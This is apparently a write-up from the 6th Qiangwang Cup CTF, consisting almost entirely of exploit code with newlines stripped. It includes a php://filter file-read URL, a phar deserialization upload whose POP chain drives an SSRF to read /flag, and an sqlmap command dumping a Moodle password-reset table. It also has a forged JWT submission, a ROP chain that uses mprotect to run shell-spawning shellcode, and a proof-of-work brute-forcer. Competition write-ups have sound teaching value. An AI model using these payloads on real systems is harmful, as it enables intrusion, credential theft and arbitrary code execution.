第六届强网杯CTF-Wp

import socketimport timesock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.bind(('', 5000))sock.listen(5)while True:connection,address = sock.accept()try:connection.settimeout(99999999)buf = connection.recv(29999)time.sleep(1000000)print(buf)if buf == b'1':connection.send(b'welcome to server!')else:connection.send(b'please go out!')except socket.timeout:time.sleep(1000000)print(time)connection.close()

{"product":[{"id":1,"num":0},{"id":2, "num":-1,"num":1}]}

http://47.104.95.124:8080/showfile.php?f=php://filter/convert.base64-encode/resource=./demo/../index.php

guestshow = new GuestShow();$upload = new Upload();$upload->date = "";$upload2 = new Upload();$upload2->date = "http://10.10.10.10/";$a = new GuestShow();$a->file = new AdminShow();$a->file->upload = new AdminShow();$a->file->upload->str = [$upload,$upload2];$upload2->filesize = $a->file;$upload2->filesize = $a->file;$upload2->tmp = $guestshow;$upload2->tmp->str = [$guestshow];$guestshow->file = $a->file;

127.0.0.1 localhost::1 localhost ip6-localhost ip6-loopbackfe00::0 ip6-localnetff00::0 ip6-mcastprefixff02::1 ip6-allnodesff02::2 ip6-allrouters172.18.0.2 f3d4be8c693810.10.10.5 f3d4be8c6938

<?php//内⽹资源阅读器-测试机//配置信息请看phpinfo.phphighlight_file(__FILE__);if (isset($_GET['url'])){    $link = $_GET['url'];    $curlobj = curl_init();    curl_setopt($curlobj, CURLOPT_POST, 0);    curl_setopt($curlobj,CURLOPT_URL,$link);    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);    $result=curl_exec($curlobj);    curl_close($curlobj);    echo $result;}if($_SERVER['REMOTE_ADDR']==='10.10.10.101'||$_SERVER['REMOTE_ADDR']==='100.100.100.101'){    system('cat /flag');    die();}?>

POST /upload.php HTTP/1.1Host: 47.104.95.124:8080Content-Length: 926Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://47.104.95.124:8080Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryak6U5bQGmG0fmVS5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/103.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://47.104.95.124:8080/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8COOKIE:PHPSESSID=abcde;Connection: close------WebKitFormBoundaryak6U5bQGmG0fmVS5Content-Disposition: form-data; name="file"; filename="phar.jpg"Content-Type: image/jpegGIF89aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<?php__HALT_COMPILER(); ?>ôÃO:9:"GuestShow":2:{s:4:"file";O:9:"AdminShow":3:{s:6:"source";O:9:"AdminShow":3:{s:6:"source";N;s:3:"str";a:2:{i:0;O:6:"Upload":4:{s:4:"file";N;s:8:"filesize";r:2;s:4:"date";s:0:"";s:3:"tmp";N;}i:1;O:6:"Upload":4:{s:4:"file";N;s:8:"filesize";r:2;s:4:"date";s:35:"http://10.10.10.10?url=file:///flag";s:3:"tmp";O:9:"GuestShow":3:{s:4:"file";r:2;s:8:"contents";N;s:3:"str";a:1:{i:0;r:15;}}}}s:6:"filter";N;}s:3:"str";N;s:6:"filter";N;}s:8:"contents";N;}1231åb~•Ø¶test^•$$Æçíyw¡•w25Ó+x#GBMB------WebKitFormBoundaryak6U5bQGmG0fmVS5Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"敕交------WebKitFormBoundaryak6U5bQGmG0fmVS5--

sqlmap -r 1 --random-agent --dbms=mysql --batch -D moodle -T mdl_user_password_resets --dump --freshqueries

import base64from pwn import *r=remote('47.104.76.78',23334)s=b'{"alg":"myES","typ":"JWT"}'t=b'{"iss":"qwb","exp":11659200191758,"name":"1","admin":true}'a=f"{base64.b64encode(s).decode()}.{base64.b64encode(t).decode()}.{base64.b64encode(bytes(64)).decode()}"r.sendline('1')r.sendline('2')r.sendline(a)r.interactive()

https://gist.github.com/hgarrereyn/9e536e8b3471d3cb8ecbb5932a776b95

#解题思路：覆盖buf指针指向可写区域0x3fe000，同时栈迁移到附近进⾏ROP，⾸先通过mprotect#赋予执⾏权限,最后执⾏shellcode即可#coding:utf-8from pwn import *context(arch='amd64',log_level='debug')p=process('./devnull')gdb.attach(p)payload='m'*0x20p.sendafter('please input your filenamen',payload)leave_ret=0x0000000000401511bss=0x3fe000payload='k'*0x14+p64(bss)*2+p64(leave_ret)p.sendafter('Please write the data you want to discardn',payload)movrax=0x0000000000401350mprotect=0x00000000004012D0shellcode=asm(shellcraft.sh())#shellcode="x31xf6x48xbbx2fx62x69x6ex2fx2fx73x68x56x53x54x5fx6ax3bx58x31xd2x0fx05"payload=p64(0x3fe028)+p64(movrax)+p64(0x3fe000)+p64(0x3fe000)+p64(0x3fe030)+p64(0x3fe010)+p64(mprotect)+p64(0x3fe068)+p64(0x3fe048)+shellcodep.sendafter('please input your new datan',payload)p.interactive()

from sage.all import *from pwn import *import stringcontext.log_level='debug'dd=string.ascii_letters+string.digitssha_done=Falser=remote('39.107.241.221',33739)r.recvuntil('sha256(XXXX+')s=r.recvuntil(') == ')[:-5]h=r.recvline()[:-1]for i in dd: for j in dd: for k in dd: for w in dd: ss_=(i+j+k+w).encode() ss=ss_+s hh=hashlib.sha256(ss).hexdigest() if h.decode()==hh: r.sendline(ss_) sha_done=True if sha_done: break if sha_done: break if sha_done: break if sha_done: breakprint('done')P=GF(2)['x']x=P.gen()for i in range(40): r.recvuntil('r(x) = ') pr=eval(r.recvline().decode().replace('^','**').strip()) r.recvuntil('a(x) = ') pa=eval(r.recvline().decode().replace('^','**').strip()) r.recvuntil('c(x) = ') pc=eval(r.recvline().decode().replace('^','**').strip()) pb=(pr-pc)/pa print(str(pb)) r.sendline(str(pb))r.interactive()

http://eci-2ze1o95qor1o4z7vdbxu.cloudeci1.ichunqiu.com/wpcontent/themes/twentytwenty/404.ph